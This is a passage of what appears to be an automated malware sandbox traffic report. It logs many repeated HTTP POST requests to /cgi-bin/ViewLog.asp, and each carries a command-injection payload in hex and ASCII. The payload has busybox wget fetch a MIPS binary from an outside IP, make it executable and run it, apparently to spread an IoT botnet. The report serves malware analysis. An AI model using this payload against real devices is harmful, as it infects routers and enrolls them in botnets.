                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              75192.168.2.1439738120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:19.214240074 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 35 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:15:02Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              76192.168.2.143453662.29.36.1968080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:19.633797884 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              77192.168.2.144650831.200.32.2318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:19.633903027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              78192.168.2.1439760120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:19.871048927 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 35 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:15:02Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              79192.168.2.144087431.136.4.618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:20.041188955 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:20.616395950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.768301010 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:24.168186903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:28.776020050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.991728067 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:57.190871000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.057255983 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              80192.168.2.144810431.136.69.1358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:20.041698933 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:20.616380930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.768304110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:24.168176889 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:28.776025057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.991730928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:57.190869093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.057272911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              81192.168.2.145428694.120.251.1738080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:20.079904079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              82192.168.2.145778094.122.64.2298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:20.086618900 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              83192.168.2.145677894.122.104.1088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:20.099380016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              84192.168.2.1439780120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:20.535806894 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 35 3a 30 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:15:03Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              85192.168.2.1439794120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:21.203341007 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 35 3a 30 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:15:04Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              86192.168.2.1439802120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:21.855438948 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 35 3a 30 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:15:04Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              87192.168.2.144262695.164.131.1118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:22.469214916 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
